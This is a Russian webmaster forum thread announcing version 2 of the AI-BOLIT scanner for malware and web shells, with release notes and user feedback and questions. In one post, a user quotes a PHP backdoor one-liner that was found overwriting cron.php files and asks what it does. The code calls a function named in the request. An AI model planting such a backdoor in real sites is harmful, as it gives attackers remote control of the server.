Сканер вирусов и вредоносного кода AI-BOLIT v2

134

gregzem

23 марта 2015, 19:06

20201

Анонсируем новую версию сканера вредоносного кода AI-BOLIT. Эту версию можно считать AI-BOLIT v2.

Что нового в версии 2?

Предыдущий топик с обсуждениями был здесь, но устарел.

Полный перечень возможностей сканера.

Сканер AI-BOLIT умеет:

искать вирусы, вредоносные и хакерские скрипты на хостинге: шеллы по сигнатурам и гибким паттернам, шеллы на основе несложной эвристики - все то, что обычные антивирусы и сканеры найти не могут
искать уязвимые скрипты timthumb, fckeditor, uploadify, и ряд других
искать редиректы в .htaccess на вредоносные сайты
искать код ссылочных бирж, таких как sape/trustlink/linkfeed/... в .php файлах
определять каталоги и файлы дорвеев
искать пустые ссылки (невидимые ссылки) в шаблонах
показывать директории, открытые на запись
работать со всеми cms без исключения (joomla, wordpress, drupal, dle, bitrix, phpbb,...)
отсылать отчет по email или сохранять в файл

Скачать сканер можно на странице http://revisium.com/ai/

Инструкция по работе и часто-задаваемые вопросы.

Если самостоятельно вы не можете разобраться с отчетом, присылайте его в виде .zip архива на ai@revisium.com с пометкой "Отчет AI-BOLIT для анализа".

Антивирус для ISPmanager (https://revisium.com/ru/products/antivirus_for_ispmanager/) | Антивирус для Plesk (https://plesk.revisium.com) | Профессиональное лечение и защита сайтов (https://revisium.com/)

8

350

Maxim-KL

23 марта 2015, 19:07

#1

gregzem, Спасибо, первая мне действительно помогла и даже не раз. Надеюсь вторая будет еще лучше.

1

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)

249

ProLiant

24 марта 2015, 06:40

#2

Да, действительно, довольно хороший скрипт. Плюс обращался за услугами к gregzem. Остались только положительные впечатления от сотрудничества.

1

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)

R

139

Ruslay

28 марта 2015, 11:24

#3

Хороший скрипт, но новая версия поначалу шокирует красным сообщением "Внимание! На вашем сайте обнаружен вредоносный код", которое появляется и на чистых сайтах (старая версия ругалась только при реальном обнаружении вирусов). Это заставляет вебмастера понапрасну нервничать, к счастью, ниже появляется зеленая надпись "Вредоносные скрипты не найдены", которая несколько успокаивает. Как хочешь, так и понимай :)

Одним словом, юзабилити новой версии требует существенного улучшения.

1

gif ai-bolit.gif

Яндекс без причины помечает Яндекс находит вредоносный код Масовое обнаружение вредоносных кодов

134

gregzem

4 апреля 2015, 08:56

#4

Ruslay:

Одним словом, юзабилити новой версии требует существенного улучшения.

Поправим в следующем релизе. Спасибо.

71

griped

4 апреля 2015, 09:23

#5

Спасибо, посоветую товарищу, тем более бесплатно.

292

anser06

7 апреля 2015, 18:59

#6

Спасибо автору за бесплатный скрипт, который несколько раз выручал.

134

gregzem

18 мая 2015, 13:40

#7

Релиз AI-BOLIT 20150508

http://revisium.com/ai/

Что нового:

- новые сигнатуры хакерских скриптов, фишинговых страниц, вирусов в JS

- исправлена ошибка оптимизированного поиска

- исправлена ошибка сканирования через браузер

- добавлены aknown файлы для #wordpress, #joomla, #magento

- изменен процесс сканирования и отчет для блока "предупреждения"

Рекомендуем скачать и проверить сайты новой версией в режиме "параноидальный".

Бонус треком сегодня следующие ссылки:

- Наша статья "Сделайте 4 ошибки и попрощайтесь со своим сайтом" про ошибки управления, которые приводят к потере сайта

- Презентация с конференции Failover 2015 "Сайт под атаками" про нецелевые атаки на сайт и защиту от них

- совместный проект команды безопасного поиска Яндекса и нашей компании "Ревизиум"

- ссылка на нашу группу "Безопасность сайтов" в ВК, где выкладываем анонсы уязвимостей, материал по защите сайтов от взлома и много другой полезной информации для веб-мастеров и владельцев сайтов.

- наш твиттер @revisium

3

Скрипт для поиска шеллов Удаление вирусов с сайтов, timeweb заблочил

AR

18

AntonRa

18 мая 2015, 21:37

#8

Скрипт наикрутейший) Выручал не однократно. Единственно что хотелось бы, сокращение времени проверки..

1

Надёжные VPC (https://selectel.ru/?ref_code=9PDbQ7YbKH32) для серьёзных проектов.

65

draff

19 мая 2015, 11:23

#9

AntonRa:
Единственно что хотелось бы, сокращение времени проверки..

Зависит от веса сайта. Если скрипт не успевает срабатывать на хостинге с корня сайта, ложу айболит поочередно в каждую папку и запускаю.

1

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)

D

194

Djusha

20 мая 2015, 07:11

#10

Здравствуйте! Доброго времени и спасибо за скрипт :)

несколько вопросов

1. Каким образом в терминале запустить скрипт, чтобы он фоном работал, и продолжал работать после отключения от терминала

пробую так, он работает, но вылетает после выключения терминала... приходится компьютер включеный оставлять это раз.

Второе... инет пропадает временами и отключается скрипт ...

php -q /home/mypath/data/ai-bolit/ai-bolit.php --path=/home/mypath/data/www/ --report=/home/mypath/data/ai-bolit/rep.html --mode=0 --size=2000K > /dev/null 2

2. Имеется ли возможность, чтобы скрипт писал отчет сразу после нахождения подозрительных файлов?

Скрипт очень долго проверяет, можно было бы уже начинать чистить проблемные файлы... до окончания работы скрипта

3. разбираюсь с последствиями... файлы cron.php были перезаписаны вот этим кодом...

<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>

Вроде крон для них не должен был запустится, но если так, Что могли сделать этим кодом?

4. Отчет выводит жутко бледными буквами, можно ли где то самому цвета поправить на более контрастные?

Спасибо!!!

---------- Добавлено 20.05.2015 в 13:30 ----------

Таки да :) http://habrahabr.ru/post/137337/ помогло,

вот так получается запускать

$ php -q script.php < /dev/null > script.log &

остальные вопросы остались, плюс вопрос про формат игнор листа

.adirignore

записал вот так...

/webstat/

/config/cache/

но вроде не игнорирует, все равно проверяет... или я не прав?

А маски можно? можно пример?

тот же вопрос по формату .aignore

хотелось бы с масками и примерами!!!

Спасибо!

Разработка сайтов от KAstudio.ru ( https://kastudio.ru/ )

php как сделать так Отзыв о timeweb.ru [PHP] php5-fss для Denwer?

Все что нужно знать о DDоS-атаках грамотному менеджеру

Яндекс Вебмастер вынес товарные фиды в отдельный раздел